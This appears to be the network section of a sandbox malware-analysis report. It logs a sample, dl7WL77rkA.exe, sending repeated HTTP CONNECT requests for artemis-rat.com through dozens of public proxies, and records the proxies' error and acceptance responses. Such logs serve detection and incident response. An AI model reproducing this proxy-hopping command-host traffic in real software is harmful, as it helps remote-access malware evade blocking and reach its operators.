                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.154845953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.170545101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217936993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.358632088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424065113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599617958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.811464071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            405192.168.2.551036163.172.147.9163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184257984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.139297962 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            406192.168.2.550994182.106.220.25290913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184359074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.529982090 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
407 | 192.168.2.5 | 51042 | 60.246.122.244 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.184803963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.491148949 CET | 172 | IN | Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.2.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
408 | 192.168.2.5 | 51203 | 104.21.64.208 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.184987068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.339567900 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
409 | 192.168.2.5 | 51220 | 172.67.53.215 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.187443018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.342299938 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
410 | 192.168.2.5 | 51241 | 172.67.182.83 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.189786911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.344103098 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
411 | 192.168.2.5 | 51004 | 79.119.155.63 | 8080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.190836906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
412 | 192.168.2.5 | 51051 | 91.189.177.189 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.201565981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.529459953 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Server: squid/5.7
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3628
X-Squid-Error: ERR_ACCESS_DENIED 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from lb1
X-Cache-Lookup: NONE from lb1:3128
Via: 1.1 lb1 (squid/5.7)
Connection: close
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            413192.168.2.551279172.67.69.9803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.205559015 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.359790087 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            414192.168.2.551235146.190.35.1180003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.205818892 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            415192.168.2.551075128.140.26.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.218305111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.532059908 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.25.2
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            416192.168.2.55147843.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.222276926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            417192.168.2.55104191.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.222285032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            418192.168.2.55148143.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.223495007 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            419192.168.2.55148743.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.225435972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            420192.168.2.551141184.181.217.19441453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.225491047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            421192.168.2.551210172.93.111.235443743876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.228209019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.748593092 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.404886961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.811286926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.446439028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.083571911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.811362028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.201989889 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            422192.168.2.551228198.12.255.19368213876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.228336096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.748598099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.389261961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702048063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405239105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            423192.168.2.551045194.53.158.57532813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.229993105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.951729059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            424192.168.2.55113293.190.141.102148883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.232759953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.532363892 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            425192.168.2.5511188.213.128.908083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.237684011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.548166990 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            426192.168.2.55029172.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242158890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            427192.168.2.551175174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.243036032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            428192.168.2.55117398.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.243760109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            429192.168.2.551099157.25.92.7431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.250482082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.595185995 CET1254INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/3.5.28
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from ah_test
                                                                                                                                                                                                                                                            Via: 1.1 ah_test (squid/3.5.28)
                                                                                                                                                                                                                                                            Connection: close
